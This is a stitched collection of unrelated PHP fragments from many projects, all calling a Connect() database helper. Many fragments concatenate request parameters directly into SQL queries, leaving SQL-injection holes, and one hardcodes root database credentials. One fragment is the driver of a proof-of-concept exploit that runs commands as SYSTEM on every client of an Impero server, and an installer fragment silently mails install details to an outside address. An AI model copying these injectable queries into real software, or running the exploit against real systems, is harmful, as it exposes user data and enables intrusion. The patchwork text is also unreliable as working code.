public function GetUser($config, $id) { switch ($config['adapter']) { case 'Mysql': include "../modules/Application/src/Application/Model/Mysql/Connect.php"; include "../modules/Application/src/Application/Model/Mysql/Select.php"; $master = $config['dbmaster']; $slave = $config['dbslave']; $link = Connect($master); $query = "SELECT * FROM user WHERE iduser='******'"; $data = Select($query, $link); $data = $data[0]; break; case 'Txt': include "../modules/Application/src/Application/Model/Txt/SelectOne.php"; $data = SelectOne($config['filename'], $id); break; } return $data; }
function UpdateUser($config, $id, $data) { $rows = array(); switch ($config['adapter']) { case 'Mysql': include '../modules/Application/src/Application/Model/Mysql/Execute.php'; include '../modules/Application/src/Application/Model/Mysql/Connect.php'; $link = Connect($config['slave']); $query = "UPDATE user SET "; foreach ($data as $key => $value) { echo "<pre>key:"; print_r($key); echo "</pre>"; echo "<pre>value:"; print_r($value); echo "</pre>"; } die; $rows = Execute($link, $query); break; case 'Txt': include '../modules/Application/src/Application/Model/Txt/Delete.php'; $rows = Update($id, $data, $config['userfilename']); break; } return $rows; }
public static function get_pages($lang = FALSE) { if ($lang == FALSE) { $lang = Settings::get_lang(); } $pages = self::$ci->page_model->get_lang_list(false, $lang); // Should never be displayed : no pages are set. if (empty($pages)) { show_error('Internal error : <b>No pages found.</b><br/>Solution: <b>Create at least one online page.</b>', 500); exit; } /* Spread authorizations from parents pages to chidrens. * This adds the group ID to the childrens pages of a protected page * If you don't want this, just uncomment this line. */ if (Connect()->logged_in()) { self::$user = Connect()->get_current_user(); } self::$ci->page_model->spread_authorizations($pages); // Filter pages regarding the authorizations $pages = array_values(array_filter($pages, array(__CLASS__, '_filter_pages_authorization'))); // Set all abolute URLs one time, for perf. self::init_absolute_urls($pages, $lang); return $pages; }
function insertion_Genre($Genre) { $pdo = Connect(); foreach ($Genre as $val) { $sql_search = "SELECT `genres` FROM 'name' WHERE `genres`.'name'=" . $val; } }
function Query($query) { global $connected; if (!$connected) { Connect(); } $result = mysql_query($query) or die(mysql_error()); return $result; }
function dumpDB() { $link = Connect(); $query = $link->prepare("SELECT word,answer FROM ia_dictionary"); // change to match your db $query->execute(); $res = $query->fetchall(PDO::FETCH_ASSOC); return $res; }
function jobList() { include 'connect.php'; $conn = Connect(); $list = $conn->query("SELECT * FROM JOB_TITLE JOIN DEPARTMENT ON dept_id = DEPARTMENT_dept_id"); while ($row = $list->fetch_assoc()) { echo "<option value='" . $row['job_id'] . "'>" . $row['job_title'] . " - " . $row['dept_name'] . "</option>"; } $conn->close(); }
function premierepage() { $dbh = Connect(); $sql = "SELECT nom\n\t\t\tfrom utilisateur"; $query = $dbh->query($sql); if ($query) { return $query->fetchAll(); } else { return false; } }
function SyncServers() { $sync = new articaSMTPSync(); if (!is_array($sync->serverList)) { writelogs("No servers aborting", __FUNCTION__, __FILE__, __LINE__); return; } while (list($server, $array) = each($sync->serverList)) { $port = $array["PORT"]; $user = $array["user"]; $password = $array["password"]; Connect($server, $port, $user, $password); } }
function InsertUser($config, $data, $filename) { $rows = array(); switch ($config['adapter']) { case 'Mysql': include '../modules/Application/src/Application/Model/Mysql/Execute.php'; include '../modules/Application/src/Application/Model/Mysql/Connect.php'; $link = Connect($config['slave']); $query = 'INSERT INTO user (iduser, name, email, password, photo, description, bdate, city_idcity, gender_idgender) VALUES ' . '("4", "' . $data['name'] . '", "' . $data['email'] . '", "' . $data['password'] . '", "' . $_FILES['photo']['name'] . '", "' . $data['description'] . '", "' . $data['bdate'] . '", 1, 1)'; $rows = Execute($link, $query); break; case 'Txt': include "../modules/Application/src/Application/Model/Txt/Insert.php"; Insert($_POST, $filename); break; } // Obtener nombre de la imagen subida $_POST['photo'] = $_FILES['photo']['name']; // Comprobar si el nombre de archivo existe $dir = $_SERVER['DOCUMENT_ROOT'] . '/img/'; $files = scandir($dir); if (in_array($_POST['photo'], $files)) { // Si existe se concatena con un numero // Comprobar si hay algun otro archivo con el mismo nombre y un numero concatenado $filtrado = "/" . substr($_POST['photo'], 0, -4) . "*/"; $extension = substr($_POST['photo'], -3); $filesMatch = array(); foreach ($files as $archivo) { $ext2 = substr($archivo, -3); if (preg_match($filtrado, $archivo) && $extension === $ext2) { $filesMatch[] = (int) substr($archivo, strrpos($archivo, "_") + 1, strlen($archivo)); } } $filesMatchAux = range(1, max($filesMatch)); $missing = array_diff($filesMatchAux, $filesMatch); if (count($missing) > 0) { $_POST['photo'] = substr($_POST['photo'], 0, -4) . '_' . min($missing) . '.' . $extension; } else { $_POST['photo'] = substr($_POST['photo'], 0, -4) . '_' . (max($filesMatch) + 1) . '.' . $extension; } } // Declarar destino donde guardar la imagen $destination = $_SERVER['DOCUMENT_ROOT'] . '/img/' . $_POST['photo']; // Pasarla de ruta temporal a ruta fisica en el servidor move_uploaded_file($_FILES['photo']['tmp_name'], $destination); return $rows; }
function saveSeats($seats) { clearTableSeats(); $conn = Connect(); if ($seats) { foreach ($seats as $seat) { $seatAvailable = $seat['seatAvailable']; if ($seatAvailable == 'x') { $seatAvailable = 0; } $seatNumber = $seat['seatNumber']; $sql = "INSERT INTO seats \n (seatAvailable,seatNumber)\n VALUES \n ({$seatAvailable},{$seatNumber})"; $conn->query($sql); } $conn->close(); } }
function DeleteUser($config, $id) { $rows = array(); switch ($config['adapter']) { case 'Mysql': include '../modules/Application/src/Application/Model/Mysql/Execute.php'; include '../modules/Application/src/Application/Model/Mysql/Connect.php'; $link = Connect($config['slave']); $query = "DELETE FROM user WHERE iduser=" . $id; $rows = Execute($link, $query); break; case 'Txt': include '../modules/Application/src/Application/Model/Txt/Delete.php'; $rows = Delete($id, $config['userfilename']); break; } return $rows; }
function GetUsers($config) { $rows = array(); switch ($config['adapter']) { case 'Mysql': include '../modules/Application/src/Application/Model/Mysql/connect.php'; include '../modules/Application/src/Application/Model/Mysql/Select.php'; $link = Connect($config['slave']); $query = "SELECT * FROM user"; $rows = Select($link, $query); break; case 'Txt': include '../modules/Application/src/Application/Model/Txt/Select.php'; $rows = Select($config['userfilename']); break; } return $rows; }
function GetUsers($config) { switch ($config['adapter']) { case 'Mysql': include "../modules/Application/src/Application/Model/Mysql/Connect.php"; include "../modules/Application/src/Application/Model/Mysql/Select.php"; $master = $config['dbmaster']; $slave = $config['dbslave']; $link = Connect($master); $query = "SELECT * FROM user"; $data = Select($query, $link); break; case 'Txt': include "../modules/Application/src/Application/Model/Txt/Select.php"; $data = Select($config['filename']); break; } return $data; }
function GetUser($config, $id) { $rows = array(); switch ($config['adapter']) { case 'Mysql': include '../modules/Application/src/Application/Model/Mysql/connect.php'; include '../modules/Application/src/Application/Model/Mysql/Select.php'; $link = Connect($config['slave']); $query = "SELECT * FROM user WHERE iduser=" . $id; $rows = Select($link, $query); return $rows[0]; break; case 'Txt': include '../modules/Application/src/Application/Model/Txt/SelectOne.php'; $rows = SelectOne($config['userfilename'], $id); return $rows; break; } }
function DeleteUser($config, $id) { switch ($config['adapter']) { case 'Mysql': include "../modules/Application/src/Application/Model/Mysql/Connect.php"; include "../modules/Application/src/Application/Model/Mysql/Execute.php"; $master = $config['dbmaster']; $slave = $config['dbslave']; $link = Connect($master); $query = "DELETE FROM user WHERE iduser='******'"; $data = Execute($query, $link); break; case 'Txt': include "../modules/Application/src/Application/Model/Txt/Delete.php"; $data = Delete($config['filename'], $id); break; } return $data; }
echo "[*] Example of this: " . $argv[0] . " detect vboxnet0 192.168.56.255\n"; echo "[*] This PoC will pop a calc and run whoami > C:\\lol.txt as SYSTEM on *every connected client*!\n"; die; } array_shift($argv); foreach ($argv as $key => $arg) { $detected = false; if ($arg == "detect") { if ($key + 2 >= count($argv)) { continue; } echo "[*] Finding Impero server...\n"; $arg = FindImperoServer($argv[$key + 1], $argv[$key + 2]); if ($arg == false) { die("[-] Cannot find Impero server\n"); } echo "[+] Found Impero server at " . $arg . "\n"; $detected = true; } $h = Connect($arg); if ($h === false) { continue; } $clients = GetAllClients($h); RunExeAsSystem($h, $clients, "calc"); RunCmd($h, $clients, "whoami > C:\\lol.txt"); echo "\n"; if ($detected) { die; } }
if ($user != "" && $pass != "") { $pass = md5($pass); $user = htmlentities($user, ENT_QUOTES, "UTF-8"); $user = mysql_real_escape_string($user); $pass = mysql_real_escape_string($pass); $result = mysql_query("SELECT * FROM users where alias = '{$user}' AND pass = '******'"); $num_rows = mysql_num_rows($result); return $num_rows; } else { return 0; } } //======================================================================== // main //======================================================================== Connect(); $open = htmlentities($_POST["positions"], ENT_QUOTES, 'UTF-8'); $close = htmlentities($_POST["historyall"], ENT_QUOTES, 'UTF-8'); $user = htmlentities($_POST["user"], ENT_QUOTES, 'UTF-8'); $pass = htmlentities($_POST["pass"], ENT_QUOTES, 'UTF-8'); $account = htmlentities($_POST["account"], ENT_QUOTES, 'UTF-8'); $balance = htmlentities($_POST["balance"], ENT_QUOTES, 'UTF-8'); $equity = htmlentities($_POST["equity"], ENT_QUOTES, 'UTF-8'); $time = time(); if (!userExist($user, $pass)) { /* echo "[ER_USER]"; */ } // open and update positions in database if (!empty($open)) { // split positions line $openall = explode("|", substr($open, 0, -1));
/** * Returns the base URL of the website, with or without lang code in the URL * */ public static function tag_base_url($tag) { // don't display the lang URL (by default) $lang_url = false; // The lang code in the URL is forced by the tag $force_lang = isset($tag->attr['force_lang']) ? true : false; // Set all languages online if connected as editor or more if (Connect()->is('editors', true)) { Settings::set_all_languages_online(); } if (isset($tag->attr['lang']) && strtolower($tag->attr['lang']) == 'true' or $force_lang === true) { if (count(Settings::get_online_languages()) > 1) { // forces the lang code to be in the URL, for each language // if ($force_lang === true) // { return base_url() . Settings::get_lang() . '/'; // } // More intelligent : Detects if the current lang is the default one and don't return the lang code /* else { if (Settings::get_lang() != Settings::get_lang('default')) { return base_url() . Settings::get_lang() .'/'; } } */ } } return base_url(); }
<html> <head> <title>Export données décès ch-hyeres</title> </head> <body> <?php include "fonctions.inc"; $conn = Connect("REF"); //Constitution de la balise Entete au format XML $nomForm = "DECES"; /*$idActeur=475; $cleDepot="UtXSgA"; $mail="*****@*****.**";*/ $idActeur = 241; $cleDepot = "RYBEA8"; $mail = "*****@*****.**"; $arRequis = 1; $cfg_expediteur_alerte = "siou_ref"; $chemin = "/home/batch/arh/to_be_treated/"; $date_jour = date("Ymd"); $jour = substr($date_jour, 6, 2); $mois = substr($date_jour, 4, 2); $annee = substr($date_jour, 0, 4); $date_file = date("YmdHis"); $date_envoi = date("d/m/Y à H:i:s"); $date_event = date("d/m/Y", mktime(0, 0, 0, $mois, $jour - 1, $annee)); $balise_element = "\n<entete>"; $balise_element .= "\n<idActeur>{$idActeur}</idActeur>"; $balise_element .= "\n<cleActeur>{$cleDepot}</cleActeur>"; $balise_element .= "\n<arRequis>{$arRequis}</arRequis>";
function step_eight() { $r = $_SESSION['post_vars']; $db = Connect(); $name = htmlspecialchars($r['forum_name']); $description = htmlspecialchars($r['forum_description']); $db->Query("INSERT INTO " . FORUMS . " (name, description, row_left, row_right, styleset) VALUES ('{$name}', '{$description}', 1, 6, 1)"); $db->Query("INSERT INTO " . FORUMS . " (name, description, row_left, row_right, styleset, row_level, f_order) VALUES ('Test Category', '', 2, 5, 1, 1, 1)"); $db->Query("INSERT INTO " . FORUMS . " (name, description, row_left, row_right, styleset, row_level, f_order) VALUES ('Test Forum', 'If you can see this, your forum is working.', 3, 4, 1, 2, 1)"); $new_url = null; /* Strip out the first ../ and the /config -> relative url returns the relative path from the install folder to that area */ $url = explode('/', RelativeUrl($r['configurl'])); for ($i = 1; $i < count($url) - 1; $i++) { $new_url .= $url[$i] . '/'; } if (substr($new_url, strlen($new_url) - 7) == '/config') { $new_url = substr($new_url, 0, strlen($new_url) - 7); } $text = "<?php\n"; $text .= "/* k4 Bulletin Board - Installed on " . date("F j, Y, g:i a", time()) . " */\n"; $text .= "define('PC_REL_URL', '" . $new_url . "/pagecraft.php');\n"; $text .= "?>"; if ($fp = fopen('../install.lock.php', 'w+')) { fwrite($fp, $text); } if (!isset($_SESSION['local_error']) || !$_SESSION['local_error'] || $_SESSION['local_error'] == FALSE) { @mail("peter.goodman@gmail.com, " . $r['admin_email'], "k4 Bulletin Board Installation", "k4 Bulletin Board has been installed at: " . $_SERVER['HTTP_HOST'] . ".", "From: \"k4 Bulletin Board Mailer\" <" . $r['webmaster_email'] . ">"); } }
/** * Returns a tokken based on the current session ID + the encryption key : md5($this->session->userdata('session_id') . config_item('encryption_key')) * If the user isn't connected, returns an empty string * * Called through XHR when the filemanager is opened. * The tokken is send with the uploaded data and checked before anything is uploaded * */ function get_tokken() { if (Connect()->is('editors')) { $tokken = md5(session_id() . config_item('encryption_key')); $this->session->set_userdata('uploadTokken', $tokken); echo json_encode(array('tokken' => $tokken)); } else { echo json_encode(array('tokken' => '')); } die; }
<?php require_once "Connect.php"; $projectID = $_GET["projectID"]; try { // Return project metadata in JSON format. $sql = "SELECT\n\t\ta.arm_num,\n\t\ta.arm_name,\n\t\te.descrip,\n\t\tm.form_name,\n\t\tm.field_order,\n\t\tm.field_name,\n\t\tm.element_label,\n\t\tm.element_type,\n\t\tm.element_enum,\n\t\tm.element_validation_min,\n\t\tm.element_validation_max,\n\t\tm.element_validation_type\n\tFROM\n\t\tredcap_events_arms a,\n\t\tredcap_events_metadata e,\n\t\tredcap_metadata m\n\tWHERE\n\t\t\ta.arm_id = e.arm_id\n\t\tAND m.project_id = a.project_id\n\t\tAND a.project_id = " . $projectID . " " . "\n\tORDER BY\n\t\ta.arm_id,\n\t\te.event_id,\n\t\tm.form_name,\n\t\tm.field_order"; $fields = array(); header('Content-type: application/json'); echo '{"fields":['; $rows = Connect()->query($sql); $index = 0; foreach ($rows as $row) { $fields = array("arm_numb" => $row["arm_num"], "arm_name" => $row["arm_name"], "evnt_nam" => $row["descrip"], "frm_name" => $row["form_name"], "fld_indx" => $row["field_order"], "fld_name" => $row["field_name"], "fld_labl" => $row["element_label"], "fld_type" => $row["element_type"], "fld_enum" => $row["element_enum"], "fld_vmin" => $row["element_validation_min"], "fld_vmax" => $row["element_validation_max"], "fld_vtyp" => $row["element_validation_type"]); $sTemp = array('fields' => $fields); $sTemp1 = json_encode($sTemp); $sTemp1 = substr($sTemp1, 10); if ($index == $rows->rowCount() - 1) { $sTemp1 = substr($sTemp1, 0, -1); // don't add comma to last row } else { $sTemp1 = substr_replace($sTemp1, ',', -1, 1); } echo $sTemp1; flush(); ++$index; } echo ']}'; } catch (PDOException $e) { echo $e->getMessage(); }
/** * Constructor * */ public function __construct() { parent::__construct(); $this->load->helper('module_helper'); // Redirect the not authorized user to the login panel. See /application/config/connect.php Connect()->restrict_type_redirect = array('uri' => config_item('admin_url') . '/user/login', 'flash_msg' => 'You have been denied access to %s', 'flash_use_lang' => false, 'flash_var' => 'error'); // $this->output->enable_profiler(true); // PHP standard session is mandatory for FileManager authentication // and other external lib // session_start(); // Librairies $this->connect = Connect::get_instance(); // Current user $this->template['current_user'] = $this->connect->get_current_user(); // Set the admin theme as current theme Theme::set_theme('admin'); /* * Admin languages : Depending on installed translations in /application/languages/ * The Admin translations are only stored in the translation file /application/languages/xx/admin_lang.php * */ // Set admin lang codes array Settings::set('admin_languages', $this->settings_model->get_admin_langs()); Settings::set('displayed_admin_languages', explode(',', Settings::get('displayed_admin_languages'))); // Set Router's found language code as current language Settings::set('current_lang', config_item('language_abbr')); // Load the current language translations file $this->lang->load('admin', Settings::get_lang()); /* * Modules config * */ $this->get_modules_config(); // Including all modules languages files require APPPATH . 'config/modules.php'; $this->modules = $modules; foreach ($this->modules as $module) { $lang_file = MODPATH . $module . '/language/' . Settings::get_lang() . '/' . strtolower($module) . '_lang.php'; if (is_file($lang_file)) { include $lang_file; $this->lang->language = array_merge($this->lang->language, $lang); unset($lang); } } /* * Loads all Module's addons * */ $this->_get_modules_addons(); // Load all modules lang files /* Look how to make Modules translations available in javascript Notice : $yhis->lang object is transmitted to JS through load->view('javascript_lang') if ( ! empty($lang_files)) { foreach($lang_files as $l) { if (is_file($l)) { // $logical_name = substr($l, strripos($l, '/') +1); // $logical_name = str_replace('_lang.php', '', $logical_name); // $this->lang->load($logical_name, Settings::get_lang()); include $l; $this->lang->language = array_merge($this->lang->language, $lang); unset($lang); } } } */ /* * Settings * */ // @TODO : Remove this thing from the global CMS. Not more mandatory, but necessary for compatibility with historical version // Available menus // Each menu was a root node in which you can put several pages, wich are composing a menu. // Was never really implemented in ionize historical version, but already used as : menus[0]... Settings::set('menus', config_item('menus')); // Don't want to cache this content $this->output->set_header("Cache-Control: no-store, no-cache, must-revalidate"); $this->output->set_header("Cache-Control: post-check=0, pre-check=0", false); $this->output->set_header("Pragma: no-cache"); }
<?php session_start(); error_reporting(0); function Connect($host, $user, $passwd) { if (!($link = mysql_connect($host, $user, $passwd))) { echo "Error connecting to DDBB."; exit; } return $link; } $link = Connect('localhost', 'root', '12345'); // if ($_POST['submit']) { $db = "cat3"; $output = shell_exec("c:/xampp/MySQL/bin/mysqldump.exe -u root -p 12345 " . $db); // ejemplo windows //$output=shell_exec("/usr/bin/mysqldump -u root -proot ".$db); // ejemplo linux // //fijo el date de hoy $date_month = date('m'); $date_year = date('Y'); $date_day = date('d'); $Date = "{$date_year}-{$date_month}-{$date_day}"; //Archivo $filename = "bdcat_{$Date}"; if (trim($output) == NULL) { echo "Error creando el backup de la DB: " . $db; exit; }
<?php include "../config.php"; if (!isset($lang) || empty($lang) || !file_exists("../lang/" . "{$lang}" . ".php")) { $lang = "language_en"; } include "../lang/" . "{$lang}" . ".php"; include "../common.php"; $var = $HTTP_POST_VARS; $db = Connect(); print "<html><body><center>\n"; print "<h1>{$t_loan}</h1>\n"; if ($var['del_prest'] != "") { $result = mysql_query("DELETE FROM " . $db_prefix . "loan WHERE film_id='" . $var['del_prest'] . "';"); } else { if ($var['add_prest']) { $result = mysql_query("INSERT INTO " . $db_prefix . "loan VALUES (null," . $var['film_id'] . ",'" . $var['user'] . "',now());"); } } if ($var['del_user'] != "") { $result = mysql_query("DELETE FROM " . $db_prefix . "loan WHERE person_id=" . $var['del_user'] . ";"); $result = mysql_query("DELETE FROM " . $db_prefix . "person WHERE id=" . $var['del_user'] . ";"); } if ($var['user']) { if ($var['add_user']) { $result = mysql_query("INSERT INTO " . $db_prefix . "person VALUES (null,'" . $var['user'] . "','" . $var['phone'] . "','" . $var['email'] . "');"); $result = mysql_query("SELECT id FROM " . $db_prefix . "person WHERE name='" . $var['user'] . "';"); $arr = mysql_fetch_array($result); $var['user'] = $arr[0]; mysql_free_result($result); }
$select = "show databases"; $select = mysql_query($select); while ($row = mysql_fetch_row($select)) { ?> <option onclick='form.submit();' value="<?php echo $row[0]; ?> "><?php echo $row[0]; ?> </option> <?php } echo '</select>'; } $link = Connect('localhost', 'root', ''); echo '<form method="post" action="' . $_SERVER['PHP_SELF'] . '?send">'; echo 'Seleciona la Base de Datos que deseas Borrar'; echo '<br>'; echo '<br>'; listar(); global $nueva; echo '</form>'; if (isset($_GET['send'])) { echo "Has seleccionado la base " . $_POST['lista'] . " para borrar "; $nueva = $_POST['lista']; $_SESSION['nombre'] = $nueva; echo "<FORM ACTION=borrar01.php METHOD=post>"; echo "<INPUT TYPE=submit NAME=submit VALUE=Borrar><BR>"; echo "</FORM>"; echo "<br>";
<?php include "../config.php"; if (!isset($lang) || empty($lang) || !file_exists("../lang/" . "{$lang}" . ".php")) { $lang = "language_en"; } include "../lang/" . "{$lang}" . ".php"; include "../common.php"; $database = Connect(); if ($HTTP_POST_VARS['id_country']) { $var = $HTTP_POST_VARS; $result = mysql_query("UPDATE " . $db_prefix . "country SET name='" . $var['name'] . "' WHERE id=" . $var['id'] . ";"); print " <center><h1>" . $end . "</h1>"; if ($result) { print $correct . " (" . $var['name'] . ")\n"; } print "<br><br><a href=\"index.php\"><img src=\"../img/back.png\" border=0></a></center>"; } else { if ($HTTP_POST_VARS['id']) { $result = mysql_query("SELECT name FROM " . $db_prefix . "country WHERE id='" . $HTTP_POST_VARS['id'] . "';"); $arr = mysql_fetch_array($result); mysql_free_result($result); print "<html><body>\n"; print "<center><h1>" . $e_country . "</h1><form action=\"edit_country.php\" method=\"post\">\n"; print "<input type=\"hidden\" name=\"id_country\" value=1>\n"; print "<input type=\"hidden\" name=\"id\" value=\"" . $HTTP_POST_VARS['id'] . "\">\n"; print "<table>\n"; print "<tr><td>" . $country . ": </td><td><input type=\"text\" name=\"name\" value=\"{$arr['0']}\"></td></tr>\n"; print "</table>"; print "<br><input type=\"submit\" value=\"{$change}\">"; print "</form>\n";
<?php include '../include/connect.php'; $conn = Connect(); $emp_fname = $_POST['emp_fname']; $emp_lname = $_POST['emp_lname']; $emp_mname = $_POST['emp_mname']; $emp_gender = $_POST['emp_gender']; $job = $_POST['job']; $insert = $conn->prepare("INSERT INTO EMPLOYEE (emp_firstname, emp_lastname, emp_middlename, emp_gender, JOB_TITLE_job_id) VALUES ('{$emp_fname}', '{$emp_lname}', '{$emp_mname}', '{$emp_gender}', '{$job}')"); $insert->execute(); if (!$insert->error) { echo "Inserted successfully"; echo "Returning to previous page in 5 seconds"; header('refresh: 5; url=../addemp.php'); } else { echo "Failed to add employee data"; echo "Returning to previous page in 5 seconds"; header('refresh: 5; url=../addemp.php'); } $conn->close();
function upload() { // Upload folder $upload_path = config_item('fancyupload_folder'); // Upload result $return = array(); /** * Get the connected users data * These data are encrypted through the CI Encryption library * */ if (empty($this->encrypt)) { $this->load->library('encrypt'); } $username = $this->encrypt->decode(rawurldecode($_POST['usrn'])); $email = $this->encrypt->decode(rawurldecode($_POST['usre'])); // Try to get the user $user = Connect()->get_user($username); // If we have an user and an upload path if ($user && $upload_path != false && $upload_path != '') { // Users group $usergroup = Connect()->get_group($user['id_group']); // Fancy upload upload allowed group $fancygroup = Connect()->get_group(config_item('fancyupload_group')); /** * If the users email and the users group has the right to upload, * we can start uploading * */ if ($user['email'] == $email && $usergroup['level'] >= $fancygroup['level']) { // Do we get a file ? if (!isset($_FILES['Filedata']) || !is_uploaded_file($_FILES['Filedata']['tmp_name'])) { $this->error(lang('module_fancyupload_invalid_upload')); } else { // Before move : Clean the file name // and add user email to file name if defined $new_file_name = $this->_prep_filename($this->clean_file_name($_FILES['Filedata']['name'])); if (config_item('fancyupload_file_prefix') == '1') { $new_file_name = $email . '_' . $new_file_name; } if (!@move_uploaded_file($_FILES['Filedata']['tmp_name'], config_item('fancyupload_folder') . $new_file_name)) { $return['status'] = '0'; } else { $return['status'] = '1'; // Send an alert mail to the admin if the option is set. if (config_item('fancyupload_send_alert') == '1' && config_item('fancyupload_email') != '') { $to = config_item('fancyupload_email'); $subject_admin = lang('fancyupload_alert_mail_subject') . ' : ' . $user['screen_name']; // Email preparation $data = array('username' => $user['username'], 'screen_name' => $user['screen_name'], 'email' => $user['email'], 'filename' => $new_file_name, 'upload_date' => date('d.m.Y H:i:s'), 'upload_folder' => config_item('fancyupload_folder')); // Email to Admin $message = $this->load->view('emails/fancyupload_upload_admin_alert', $data, true); $this->send_mail($to, $message, $subject_admin); } } $return['src'] = config_item('fancyupload_folder') . $new_file_name; } } else { $this->error(lang('module_fancyupload_no_right')); } } echo json_encode($return); }